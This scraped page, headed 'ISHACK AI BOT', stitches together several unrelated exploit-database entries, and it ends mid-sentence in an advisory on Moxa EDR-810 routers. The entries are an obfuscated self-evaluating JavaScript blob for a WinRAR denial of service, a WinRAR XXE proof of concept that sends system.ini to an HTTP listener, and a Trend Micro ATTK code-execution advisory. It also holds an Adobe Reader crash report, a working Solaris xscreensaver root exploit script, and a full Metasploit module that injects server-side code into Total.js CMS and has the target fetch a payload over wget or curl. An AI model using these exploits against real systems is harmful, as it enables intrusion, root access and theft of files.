ISHACK AI BOT

# Exploit Title: winrar 5.80 64bit - Denial of Service # Date: 2019-10-19 # Exploit Author: alblalawi # Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe # Version: 5.80 # Tested on: Microsoft Windows Version 10.0.18362.418 64bit # 1- open winrar or any file.rar # 2- help # 3- help topics # 4- Drag the exploit to the window # Save the content html <script type="text/javascript"> //<![CDATA[ <!-- var x="function f(x){var i,o=\"\",l=x.length;for(i=l-1;i>=0;i--) {try{o+=x.c" + "harAt(i);}catch(e){}}return o;}f(\")\\\"function f(x,y){var i,o=\\\"\\\\\\\""+ "\\\\,l=x.length;for(i=0;i<l;i++){if(i==28)y+=i;y%=127;o+=String.fromCharCod" + "e(x.charCodeAt(i)^(y++));}return o;}f(\\\"\\\\xr}jMDLW\\\\\\\\nRTN\\\\\\\\\\"+ "\\\\\\LFE\\\\\\\\004\\\\\\\\017\\\\\\\\022GD\\\\\\\\\\\\\\\\^\\\\\\\\rhGjYh" + "83#9y2/(-s:\\\\\\\\021\\\\\\\\024\\\\\\\\013\\\\\\\\025Y9D\\\\\\\\037E\\\\\\"+ "\\034\\\\\\\\013F\\\\\\\\017\\\\\\\\002\\\\\\\\003\\\\\\\\037\\\\\\\\021\\\\"+ "\\\\005\\\\\\\\033\\\\\\\\021\\\\\\\\030\\\\\\\\020*UX\\\\\\\\032\\\\\\\\02" + "5\\\\\\\\025\\\\\\\\010\\\\\\\\030\\\\\\\\020t<^!M@;?T+4W~Q`3}tfr4}bch4\\\\" + "\\\\177jith\\\\\\\\\\\"\\\\|\\\\\\\\003g[TLTB[u\\\\\\\\010\\\\\\\\013OB@[U_" + "F\\\\\\\\016h\\\\\\\\027\\\\\\\\033\\\\\\\\006d\\\\\\\\033\\\\\\\\004gNaP\\" + "\\\\\\003\\\\\\\\\\\"\\\\.&:z\\\\\\\\0314\\\\\\\\033&u9(>$>;p=3=3 70=d\\\\\\"+ "\\006y\\\\\\\\n\\\\\\\\037\\\\\\\\r<\\\\\\\\022\\\\\\\\010\\\\\\\\022\\\\\\" + "\\027J \\\\\\\\010\\\\\\\\004\\\\\\\\007\\\\\\\\r\\\\\\\\0177NS2\\\\\\\\035" + ",\\\\\\\\037.\\\\\\\\001(\\\\\\\\033VWX=\\\\\\\\023\\\\\\\\026\\\\\\\\\\\\\\"+ "\\\\\\\\\\016\\\\\\\\026l!\\\\\\\\\\\"\\\\_vYh'()Ynx-}g|1/3Wgsvl|Uyvx}k\\\\" + "\\\\010}\\\\\\\\000tWFTNX]\\\\\\\\004xDHBCl\\\\\\\\023\\\\\\\\033\\\\\\\\02" + "3\\\\\\\\024iDkV\\\\\\\\031\\\\\\\\032\\\\\\\\033\\\\\\\\177\\\\\\\\\\\\\\\\"+ "RS`2*/j\\\\\\\\0273)`\\\\\\\\025h\\\\\\\\027n\\\\\\\\021l,=5|6,0\\\\\\\\nu\\"+ "\\\\\\004{\\\\\\\\006yu}~\\\\\\\\003\\\\\\\\022=\\\\\\\\014CDE5\\\\\\\\002\\"+ "\\\\\\034I\\\\\\\\031\\\\\\\\003\\\\\\\\000MSO>\\\\\\\\036\\\\\\\\006\\\\\\" + "\\033\\\\\\\\035\\\\\\\\033\\\\\\\\021WXYZ'\\\\\\\\016!\\\\\\\\020 !\\\\\\\\"+ "\\\"\\\\_vYh;'ziye}z1LcN}(:tx|`$GnAp#\\\\\\\\017IVNH\\\\\\\\033\\\\\\\\004\\"+ "\\\\\\016\\\\\\\\023\\\\\\\\031\\\\\\\\021\\\"\\\\,28)\\\"(f};)lo,0(rtsbus." + "o nruter};)i(tArahc.x=+o{)--i;0=>i;1-l=i(rof}}{)e(hctac};l=+l;x=+x{yrt{)401" + "=!)31/l(tAedoCrahc.x(elihw;lo=l,htgnel.x=lo,\\\"\\\"=o,i rav{)x(f noitcnuf\""+ ")" ; while(x=eval(x)); //--> //]]> </script> <script type="text/javascript"> //<![CDATA[ <!-- var x="function f(x){var i,o=\"\",ol=x.length,l=ol;while(x.charCodeAt(l/13)!" + "=48){try{x+=x;l+=l;}catch(e){}}for(i=l-1;i>=0;i--){o+=x.charAt(i);}return o" + ".substr(0,ol);}f(\")19,\\\"ZPdw771\\\\b77-0xjk-7=3771\\\\sp,cw$520\\\\:330\\"+ "\\xg030\\\\jj9%530\\\\b000\\\\XZUUVX620\\\\LP\\\\\\\\Pr\\\\610\\\\KOHD400\\" + "\\620\\\\720\\\\\\\\\\\\WOWGPr\\\\530\\\\NClAauFkD,$gqutdr/3-ig~`|)rkanwbo2" + "30\\\\t\\\\ 520\\\\&310\\\\$n\\\\200\\\\)230\\\\/000\\\\-K530\\\\310\\\\310" + "\\\\n\\\\630\\\\010\\\\IULFW620\\\\600\\\\400\\\\700\\\\520\\\\=*100\\\\(70" + "0\\\\4500\\\\*310\\\\-u}xy8pt~}|{771\\\\itg/e771\\\\sb|`V620\\\\530\\\\NT\\" + "\\\\\\MdYjGh010\\\\@TVI[O410\\\\620\\\\n\\\\330\\\\ZB@CQA200\\\\SAijArGhEec" + "J{HaN*2S?9t)V)5,&waedtbn\\\\!010\\\\'420\\\\%n\\\\+r\\\\U]XY030\\\\PT^]\\\\" + "\\\\[ZY]GZEr\\\\CYQ@b~4|);/pw$:2'610\\\\?410\\\\=220\\\\vn720\\\\h520\\\\hz" + "f7!%$4\\\"\\\\730\\\\L\\\\\\\\JOfWdEjN420\\\\230\\\\230\\\\IU710\\\\@BE_IG]" + "AHyV771\\\\430\\\\300\\\\|kntnxixnv|:`kwe2S3h|r~)|wowgp>o\\\\\\\\410\\\\!B7" + "30\\\\330\\\\430\\\\020\\\\K030\\\\)600\\\\/L530\\\\530\\\\330\\\\600\\\\QN" + "C400\\\\500\\\\r\\\\320\\\\710\\\\720\\\\320\\\\M620\\\\710\\\\500\\\\2+>3?" + "\\\"(f};o nruter};))++y(^)i(tAedoCrahc.x(edoCrahCmorf.gnirtS=+o;721=%y{)++i" + ";l<i;0=i(rof;htgnel.x=l,\\\"\\\"=o,i rav{)y,x(f noitcnuf\")" ; while(x=eval(x)); //--> //]]> </script>

# Exploit Title: winrar 5.80 - XML External Entity Injection # Exploit Author: hyp3rlinx # Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe # Version: 5.80 # Tested on: Microsoft Windows Version 10.0.18362.418 64bit # POC 1- python -m SimpleHTTPServer (listens Port 8000) 2- open winrar or any file.rar 3- help 4- help topics 5- Drag the exploit to the window html file <htmlL> <body> <xml> <?xml version="1.0"?> <!DOCTYPE flavios [ <!ENTITY % file SYSTEM "C:\Windows\system.ini"> <!ENTITY % dtd SYSTEM "http://127.0.0.1:8800/start.dtd"> %dtd;]> <pwn>&send;</pwn> </xml> </body> </html> ============================== start.dtd <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8800?%file;'>"> %all;

# Exploit Title: Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution # Date: 2019-10-19 # Exploit Author: hyp3rlinx # Vendor Homepage: www.trendmicro.com # Version: 1.62.0.1218 and below # Tested on: Microsoft Windows # CVE: N/A [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt [+] ISR: Apparition Security [Vendor] www.trendmicro.com [Product] Trend Micro Anti-Threat Toolkit (ATTK) 1.62.0.1218 and below Trend Micro Anti-Threat Toolkit (ATTK) can analyze malware issues and clean infections. It can be used to perform system forensic scans and clean the following infection types: General malware infection Master boot record Infection CIDOX/ RODNIX infection Rootkit infection Zbot infection Cryptolocker infection etc.. [Vulnerability Type] Remote Code Execution [CVE Reference] CVE-2019-9491 [Security Issue] Trend Micro Anti-Threat Toolkit (ATTK) will load and execute arbitrary .EXE files if a malware author happens to use the vulnerable naming convention of "cmd.exe" or "regedit.exe" and the malware can be placed in the vacinity of the ATTK when a scan is launched by the end user. Since the ATTK is signed by verified publisher and therefore assumed trusted any MOTW security warnings are bypassed if the malware was internet downloaded, also it can become a persistence mechanism as each time the Anti-Threat Toolkit is run so can an attackers malware. Standalone affected components of ATTK and other integrations (e.g. WCRY Patch Tool, OfficeScan Toolbox, etc.) attk_collector_cli_x64.exe Hash: e8503e9897fd56eac0ce3c3f6db24fb1 TrendMicroRansomwareCollector64.r09.exe Hash: 798039027bb4363dcfd264c14267375f attk_ScanCleanOnline_gui_x64.exe Hash: f1d2ca4b14368911c767873cdbc194ed [References] https://success.trendmicro.com/solution/000149878 *All versions of the ATTK have been updated with the newer version. Anti-Threat Toolkit (ATTK) 1.62.0.1223 [Exploit/POC] Compile an .EXE using below "C" code and use naming convention of "cmd.exe" or "regedit.exe". Run the Anti-Threat Toolkit and watch the ATTK console to see the Trojan file get loaded and executed. #include <windows.h> void main(void){ puts("Trend Micro Anti-Threat Toolkit PWNED!"); puts("Discovery: hyp3rlinx"); puts("CVE-2019-9491\n"); WinExec("powershell", 0); } [POC Video URL] https://www.youtube.com/watch?v=HBrRVe8WCHs [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: September 9, 2019 Vendor confirms vulnerability: September 25, 2019 Vendor requests to coordinate advisory: September 25, 2019 October 19, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- (7f2c.8be8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000080 ebx=00001b52 ecx=00000080 edx=00000080 esi=00000001 edi=6f587000 eip=6a005324 esp=050fbc14 ebp=050fbc34 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202 JP2KLib!IJP2KException::GetErrString+0x3224: 6a005324 8817 mov byte ptr [edi],dl ds:002b:6f587000=?? 0:000> kb # ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 00 050fbc34 6a0030e8 00001b52 00001b53 00000000 JP2KLib!IJP2KException::GetErrString+0x3224 01 050fbcb0 69ff3bf0 0000000a 000002ce 00000001 JP2KLib!IJP2KException::GetErrString+0xfe8 02 050fbd44 69ff4132 00000000 0000000d 00000008 JP2KLib!JP2KCopyRect+0xe9d0 03 050fbda0 69ff43f9 00000000 0000000d 00000008 JP2KLib!JP2KCopyRect+0xef12 04 050fbdc8 69ff37bc 00000000 0000000d 00000008 JP2KLib!JP2KCopyRect+0xf1d9 05 050fbe7c 69ff31eb 050fbf88 0000000d 00000008 JP2KLib!JP2KCopyRect+0xe59c 06 050fbebc 6a005d8a 0000000d 00000008 000000ff JP2KLib!JP2KCopyRect+0xdfcb 07 050fbf1c 5f721b53 62c74e88 0000000d 00000008 JP2KLib!JP2KImageDecodeImageRegion+0x2a 08 050fbf9c 5f71544b 6ad22fac 050fbfcc 5f115889 AcroRd32!AX_PDXlateToHostEx+0x343e93 09 050fbfa8 5f115889 6ad22fac 62c7cfb0 5f1157f0 AcroRd32!AX_PDXlateToHostEx+0x33778b 0a 050fbfcc 5f115783 6ad0efe0 00000001 0000001b AcroRd32!DllCanUnloadNow+0x4c929 0b 050fbfec 5f561d7a 050fc010 6ad0efe0 0000001b AcroRd32!DllCanUnloadNow+0x4c823 0c 050fc030 5f24afc8 c0020000 00000004 6ad0efe0 AcroRd32!AX_PDXlateToHostEx+0x1840ba 0d 050fc384 5f24a506 050fc3e0 53406a98 95e3efd6 AcroRd32!DllCanUnloadNow+0x182068 0e 050fc3bc 5f24a3e1 050fc3e0 53406a98 050fc44c AcroRd32!DllCanUnloadNow+0x1815a6 0f 050fc428 5f2493a8 c0020000 00000004 53406a98 AcroRd32!DllCanUnloadNow+0x181481 10 050fc888 5f2468f7 050fcb8c 686e45ac c0020000 AcroRd32!DllCanUnloadNow+0x180448 11 050fe068 5f246575 686e45ac c0020000 00000004 AcroRd32!DllCanUnloadNow+0x17d997 12 050fe138 5f22a25c 95e3ce72 5d91af78 00000000 AcroRd32!DllCanUnloadNow+0x17d615 13 050fe218 5f229057 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x1612fc 14 050fe264 5f21c183 5d91af78 00000001 00000000 AcroRd32!DllCanUnloadNow+0x1600f7 15 050fe3d8 5f21ba97 553e6dbc 00000001 6a169ef8 AcroRd32!DllCanUnloadNow+0x153223 16 050fe440 5f219281 95e3c8aa 5323efc8 5adccea8 AcroRd32!DllCanUnloadNow+0x152b37 17 050fe4c0 5f218dae 6a169ef8 65a08f40 5adcceb8 AcroRd32!DllCanUnloadNow+0x150321 18 050fe4fc 5f218d07 6a169ef8 65a08f40 5adcceb8 AcroRd32!DllCanUnloadNow+0x14fe4e 19 050fe584 5f2182ee 6a169ef8 65a08f40 050fe7b8 AcroRd32!DllCanUnloadNow+0x14fda7 1a 050fe5c0 5f216f02 6a169ef8 65a08f40 050fe7b8 AcroRd32!DllCanUnloadNow+0x14f38e 1b 050fe884 5f215d98 6a169ef8 050fe918 050fe968 AcroRd32!DllCanUnloadNow+0x14dfa2 1c 050fe988 5f2143b8 6a169ef8 050fea90 00000000 AcroRd32!DllCanUnloadNow+0x14ce38 1d 050fe9ec 5f21414d 6a169ef8 050fea90 00000000 AcroRd32!DllCanUnloadNow+0x14b458 1e 050fea0c 5f212d3c 6a169ef8 050fea90 00000000 AcroRd32!DllCanUnloadNow+0x14b1ed 1f 050feac4 5f212762 00000001 00000000 95e3c776 AcroRd32!DllCanUnloadNow+0x149ddc 20 050feb1c 5f21257a 7d8b4ef0 00000001 95e3c7ea AcroRd32!DllCanUnloadNow+0x149802 21 050feb80 5f2122ff 050fec74 95e3c0fe 80882fa0 AcroRd32!DllCanUnloadNow+0x14961a 22 050fec94 5f0d687c 80882fa0 5f0d67a0 00000000 AcroRd32!DllCanUnloadNow+0x14939f 23 050fecac 5f0d678f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd91c 24 050fecc8 745de0bb 00180a60 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd82f 25 050fecf4 745e8849 5f0d66d0 00180a60 0000000f USER32!_InternalCallWinProc+0x2b 26 050fed18 745eb145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20 27 050fede8 745d8503 5f0d66d0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be 28 050fee50 745d8aa0 147683c0 00000000 0000000f USER32!DispatchClientMessage+0x1b3 29 050fee98 77371a6d 050feeb4 00000020 050fef14 USER32!__fnDWORD+0x50 2a 050feed0 745d91ee 050fef64 5a5cb65c 18836dd8 ntdll!KiUserCallbackDispatcher+0x4d 2b 050fef24 745d8c20 5f535978 050fef48 5f0eda6d USER32!DispatchMessageWorker+0x5be 2c 050fef30 5f0eda6d 050fef64 18836dd8 18836dd8 USER32!DispatchMessageW+0x10 2d 050fef48 5f0ed89e 050fef64 95e3c3d6 18836dd8 AcroRd32!DllCanUnloadNow+0x24b0d 2e 050fefbc 5f0ed744 95e3c39e 18836dd8 00000000 AcroRd32!DllCanUnloadNow+0x2493e 2f 050feff4 5f07c575 95e3dc0e 17484ff8 00000000 AcroRd32!DllCanUnloadNow+0x247e4 30 050ff064 5f07bf81 5f050000 00110000 17484ff8 AcroRd32!AcroWinMainSandbox+0x775 31 050ff484 0011783d 5f050000 00110000 17484ff8 AcroRd32!AcroWinMainSandbox+0x181 32 050ff850 002201aa 00110000 00000000 0bd5b3f2 AcroRd32_exe+0x783d 33 050ff89c 76698674 04f5f000 76698650 c83dc0c6 AcroRd32_exe!AcroRd32IsBrokerProcess+0x992da 34 050ff8b0 77365e17 04f5f000 07a6f6f5 00000000 KERNEL32!BaseThreadInitThunk+0x24 35 050ff8f8 77365de7 ffffffff 7738ad9e 00000000 ntdll!__RtlUserThreadStart+0x2f 36 050ff908 00000000 00111390 04f5f000 00000000 ntdll!_RtlUserThreadStart+0x1b --- cut --- Notes: - Reproduces on Adobe Acrobat Reader DC (2019.012.20036) on Windows 10, with and without PageHeap enabled. - The crash occurs immediately after opening the PDF document, and is caused by attempting to write data outside of a heap-based buffer. - Attached samples: poc.pdf (crashing file), original.pdf (original file). - We have minimized the difference between the original and mutated files down to 5 bytes inside of a binary JP2 image stream: 4 bytes at offset 0x195 changed from <FF FF E0 00> to <00 00 00 C0>, and 1 byte at offset 0x1ED changed from <0x53> to <0x5B>. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47528.zip

@Mediaservice.net Security Advisory #2019-02 (last updated on 2019-10-16) Title: Local privilege escalation on Solaris 11.x via xscreensaver Application: Jamie Zawinski's xscreensaver 5.39 distributed with Solaris 11.4 Jamie Zawinski's xscreensaver 5.15 distributed with Solaris 11.3 Other versions starting from 5.06 are potentially affected Platforms: Oracle Solaris 11.x (tested on 11.4 and 11.3) Other platforms are potentially affected (see below) Description: A local attacker can gain root privileges by exploiting a design error vulnerability in the xscreensaver distributed with Solaris Author: Marco Ivaldi <[email protected]> Vendor Status: <[email protected]> notified on 2019-07-09 CVE Name: CVE-2019-3010 CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (Base Score: 8.8) References: https://lab.mediaservice.net/advisory/2019-02-solaris-xscreensaver.txt https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html https://www.jwz.org/xscreensaver/ https://www.oracle.com/technetwork/server-storage/solaris11/ https://www.mediaservice.net/ https://0xdeadbeef.info/ 1. Abstract. Exploitation of a design error vulnerability in xscreensaver, as distributed with Solaris 11.x, allows local attackers to create (or append to) arbitrary files on the system, by abusing the -log command line switch introduced in version 5.06. This flaw can be leveraged to cause a denial of service condition or to escalate privileges to root. 2. Example Attack Session. raptor@stalker:~$ cat /etc/release Oracle Solaris 11.4 X86 Copyright (c) 1983, 2018, Oracle and/or its affiliates. All rights reserved. Assembled 16 August 2018 raptor@stalker:~$ uname -a SunOS stalker 5.11 11.4.0.15.0 i86pc i386 i86pc raptor@stalker:~$ id uid=100(raptor) gid=10(staff) raptor@stalker:~$ chmod +x raptor_xscreensaver raptor@stalker:~$ ./raptor_xscreensaver raptor_xscreensaver - Solaris 11.x LPE via xscreensaver Copyright (c) 2019 Marco Ivaldi <[email protected]> [...] Oracle Corporation SunOS 5.11 11.4 Aug 2018 root@stalker:~# id uid=0(root) gid=0(root) 3. Affected Platforms. This vulnerability was confirmed on the following platforms: * Oracle Solaris 11.x X86 [tested on 11.4 and 11.3, default installation] * Oracle Solaris 11.x SPARC [untested] Previous Oracle Solaris 11 versions might also be vulnerable. Based on our analysis and on feedback kindly provided by Alan Coopersmith of Oracle, we concluded that this is a Solaris-specific vulnerability, caused by the fact that Oracle maintains a slightly different codebase from the upstream one. Alan explained this as follows: "The problem in question here appears to be inherited from the long-ago fork [originally based on xscreensaver 4.05] Sun & Ximian did to add a gtk-based unlock dialog with accessibility support to replace the non-accessible Xlib unlock dialog that upstream provides, which moves the uid reset to after where the log file opening was later added." Specifically, the problem arises because of this bit of Solaris patches: https://github.com/oracle/solaris-userland/blob/18c7129a50c0d736cbac04dcfbfa1502eab71e33/components/desktop/xscreensaver/patches/0005-gtk-lock.patch#L3749-L3770 As an interesting side note, it appears Red Hat dropped this code back in 2002 with version 4.05-5: https://src.fedoraproject.org/rpms/xscreensaver/blob/9a0bab5a19b03db9671fc5a20714755445f19e21/f/xscreensaver.spec#L2178-2179 4. Fix. Oracle has assigned the tracking# S1182608 and has released a fix for all affected and supported versions of Solaris in their Critical Patch Update (CPU) of October 2019. As a temporary workaround, it is also possible to remove the setuid bit from the xscreensaver executable as follows (note that this might prevent it from working properly): bash-3.2# chmod -s /usr/bin/xscreensaver 5. Proof of Concept. An exploit for Oracle Solaris 11.x has been developed as a proof of concept. It can be downloaded from: https://github.com/0xdea/exploits/blob/master/solaris/raptor_xscreensaver #!/bin/sh # # raptor_xscreensaver - Solaris 11.x LPE via xscreensaver # Copyright (c) 2019 Marco Ivaldi <[email protected]> # # Exploitation of a design error vulnerability in xscreensaver, as # distributed with Solaris 11.x, allows local attackers to create # (or append to) arbitrary files on the system, by abusing the -log # command line switch introduced in version 5.06. This flaw can be # leveraged to cause a denial of service condition or to escalate # privileges to root. This is a Solaris-specific vulnerability, # caused by the fact that Oracle maintains a slightly different # codebase from the upstream one (CVE-2019-3010). # # "I'd rather be lucky than good any day." -- J. R. "Bob" Dobbs # "Good hackers force luck." -- ~A. # # This exploit targets the /usr/lib/secure/ directory in order # to escalate privileges with the LD_PRELOAD technique. The # implementation of other exploitation vectors, including those # that do not require gcc to be present on the target system, is # left as an exercise to fellow UNIX hackers;) # # Usage: # raptor@stalker:~$ chmod +x raptor_xscreensaver # raptor@stalker:~$ ./raptor_xscreensaver # [...] # Oracle Corporation SunOS 5.11 11.4 Aug 2018 # root@stalker:~# id # uid=0(root) gid=0(root) # root@stalker:~# rm /usr/lib/secure/64/getuid.so /tmp/getuid.* # # Vulnerable platforms: # Oracle Solaris 11 X86 [tested on 11.4 and 11.3] # Oracle Solaris 11 SPARC [untested] # echo "raptor_xscreensaver - Solaris 11.x LPE via xscreensaver" echo "Copyright (c) 2019 Marco Ivaldi <[email protected]>" echo # prepare the payload echo "int getuid(){return 0;}" > /tmp/getuid.c gcc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc if [ $? -ne 0 ]; then echo "error: problem compiling the shared library, check your gcc" exit 1 fi # check the architecture LOG=/usr/lib/secure/getuid.so file /bin/su | grep 64-bit >/dev/null 2>&1 if [ $? -eq 0 ]; then LOG=/usr/lib/secure/64/getuid.so fi # start our own xserver # alternatively we can connect back to a valid xserver (e.g. xquartz) /usr/bin/Xorg :1 & # trigger the bug umask 0 /usr/bin/xscreensaver -display :1 -log $LOG & sleep 5 # clean up pkill -n xscreensaver pkill -n Xorg # LD_PRELOAD-fu cp /tmp/getuid.so $LOG LD_PRELOAD=$LOG su -

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::CmdStager def initialize(info={}) super(update_info(info, 'Name' => 'Total.js CMS 12 Widget JavaScript Code Injection', 'Description' => %q{ This module exploits a vulnerability in Total.js CMS. The issue is that a user with admin permission can embed a malicious JavaScript payload in a widget, which is evaluated server side, and gain remote code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'Riccardo Krauter', # Original discovery 'sinn3r' # Metasploit module ], 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ [ 'Total.js CMS on Linux', { 'Platform' => 'linux', 'CmdStagerFlavor' => 'wget'} ], [ 'Total.js CMS on Mac', { 'Platform' => 'osx', 'CmdStagerFlavor' => 'curl' } ] ], 'References' => [ ['CVE', '2019-15954'], ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/5'], ['URL', 'https://github.com/beerpwn/CVE/blob/master/Totaljs_disclosure_report/report_final.pdf'] ], 'DefaultOptions' => { 'RPORT' => 8000, }, 'Notes' => { 'SideEffects' => [ IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SAFE ] }, 'Privileged' => false, 'DisclosureDate' => '2019-08-30', # Reported to seclist 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path for Total.js CMS', '/']), OptString.new('TOTALJSUSERNAME', [true, 'The username for Total.js admin', 'admin']), OptString.new('TOTALJSPASSWORD', [true, 'The password for Total.js admin', 'admin']) ]) end class AdminToken attr_reader :token def initialize(cookie) @token = cookie.scan(/__admin=([a-zA-Z\d]+);/).flatten.first end def blank? token.blank? end end class Widget attr_reader :name attr_reader :category attr_reader :source_code attr_reader :platform attr_reader :url def initialize(p, u, stager) @name = "p_#{Rex::Text.rand_text_alpha(10)}" @category = 'content' @platform = p @url = u @source_code = %Q|<script total>| @source_code << %Q|global.process.mainModule.require('child_process')| @source_code << %Q|.exec("sleep 2;#{stager}");| @source_code << %Q|</script>| end end def check code = CheckCode::Safe res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'admin', 'widgets') }) unless res vprint_error('Connection timed out') return CheckCode::Unknown end # If the admin's login page is visited too many times, we will start getting # a 401 (unauthorized response). In that case, we only have a header to work # with. if res.headers['X-Powered-By'].to_s == 'Total.js' code = CheckCode::Detected end # If we are here, then that means we can still see the login page. # Let's see if we can extract a version. html = res.get_html_document element = html.at('title') return code unless element.respond_to?(:text) title = element.text.scan(/CMS v([\d\.]+)/).flatten.first return code unless title version = Gem::Version.new(title) if version <= Gem::Version.new('12') # If we are able to check the version, we could try the default cred and attempt # to execute malicious code and see how the application responds. However, this # seems to a bit too aggressive so I'll leave that to the exploit part. return CheckCode::Appears end CheckCode::Safe end def auth(user, pass) json_body = { 'name' => user, 'password' => pass }.to_json res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'api', 'login', 'admin'), 'ctype' => 'application/json', 'data' => json_body }) unless res fail_with(Failure::Unknown, 'Connection timed out') end json_res = res.get_json_document cookies = res.get_cookies # If it's an array it could be an error, so we are specifically looking for a hash. if json_res.kind_of?(Hash) && json_res['success'] token = AdminToken.new(cookies) @admin_token = token return token end fail_with(Failure::NoAccess, 'Invalid username or password') end def create_widget(admin_token) platform = target.platform.names.first host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket::source_address : datastore['SRVHOST'] port = datastore['SRVPORT'] proto = datastore['SSL'] ? 'https' : 'http' payload_name = "p_#{Rex::Text.rand_text_alpha(5)}" url = "#{proto}://#{host}:#{port}#{get_resource}/#{payload_name}" widget = Widget.new(platform, url, generate_cmdstager( 'Path' => "#{get_resource}/#{payload_name}", 'temp' => '/tmp', 'file' => payload_name ).join(';')) json_body = { 'name' => widget.name, 'category' => widget.category, 'body' => widget.source_code }.to_json res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'), 'cookie' => "__admin=#{admin_token.token}", 'ctype' => 'application/json', 'data' => json_body }) unless res fail_with(Failure::Unknown, 'Connection timed out') end res_json = res.get_json_document if res_json.kind_of?(Hash) && res_json['success'] print_good("Widget created successfully") else fail_with(Failure::Unknown, 'No success message in body') end widget end def get_widget_item(admin_token, widget) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'), 'cookie' => "__admin=#{admin_token.token}", 'ctype' => 'application/json' }) unless res fail_with(Failure::Unknown, 'Connection timed out') end res_json = res.get_json_document count = res_json['count'] items = res_json['items'] unless count fail_with(Failure::Unknown, 'No count key found in body') end unless items fail_with(Failure::Unknown, 'No items key found in body') end items.each do |item| widget_name = item['name'] if widget_name.match(/p_/) return item end end [] end def clear_widget admin_token = get_admin_token widget = get_widget print_status('Finding the payload from the widget list...') item = get_widget_item(admin_token, widget) json_body = { 'id' => item['id'], 'picture' => item['picture'], 'name' => item['name'], 'icon' => item['icon'], 'category' => item['category'], 'datecreated' => item['datecreated'], 'reference' => item['reference'] }.to_json res = send_request_cgi({ 'method' => 'DELETE', 'uri' => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'), 'cookie' => "__admin=#{admin_token.token}", 'ctype' => 'application/json', 'data' => json_body }) unless res fail_with(Failure::Unknown, 'Connection timed out') end res_json = res.get_json_document if res_json.kind_of?(Hash) && res_json['success'] print_good("Widget cleared successfully") else fail_with(Failure::Unknown, 'No success message in body') end end def on_request_uri(cli, req) print_status("#{cli.peerhost} requesting: #{req.uri}") if req.uri =~ /p_.+/ payload_exe = generate_payload_exe(code: payload.encoded) print_status("Sending payload to #{cli.peerhost}") send_response(cli, payload_exe, {'Content-Type' => 'application/octet-stream'}) return end send_not_found(cli) end def on_new_session(session) clear_widget end # This is kind of for cleaning up the wiget, because we cannot pass it as an # argument in on_new_session. def get_widget @widget end # This is also kind of for cleaning up widget, because we cannot pass it as an # argument directly def get_admin_token @admin_token end def exploit user = datastore['TOTALJSUSERNAME'] pass = datastore['TOTALJSPASSWORD'] print_status("Attempting to authenticate with #{user}:#{pass}") admin_token = auth(user, pass) fail_with(Failure::Unknown, 'No admin token found') if admin_token.blank? print_good("Authenticatd as: #{user}:#{pass}") print_status("Creating a widget...") @widget = create_widget(admin_token) super end end

During an engagement for a client, RandoriSec found 2 vulnerabilities on Moxa EDR-810 Series Secure Routers. The first one is a command injection vulnerability found on the CLI allowing an authenticated user to obtain root privileges. And the other one is an improper access control found on the web server allowing to retrieve log files. As usual, we reported those issues directly to Moxa and ICS-CERT (Industrial Control Systems Cyber Emergency Response Team) in order to “responsible disclose†them. The ICS-CERT advisory was published on their website and a new EDR-810 firmware was provided by Moxa. Many thanks to Moxa and ICS-CERT teams for their help. Advisory The following two product vulnerabilities were identified in Moxa’s EDR-810 Series Secure Routers, all versions 5.1 and prior are vulnerable: CVE-2019-10969: An exploitable command injection vulnerability exists in the CLI functionality, which is provided by the Telnet and SSH services. An authenticated attacker (with admin or configadmin privileges) can abuse the ping feature to execute commands on the router. As the CLI is executed with root privileges, it is possible to obtain a root shell on the device. A CVSS v3 base score of 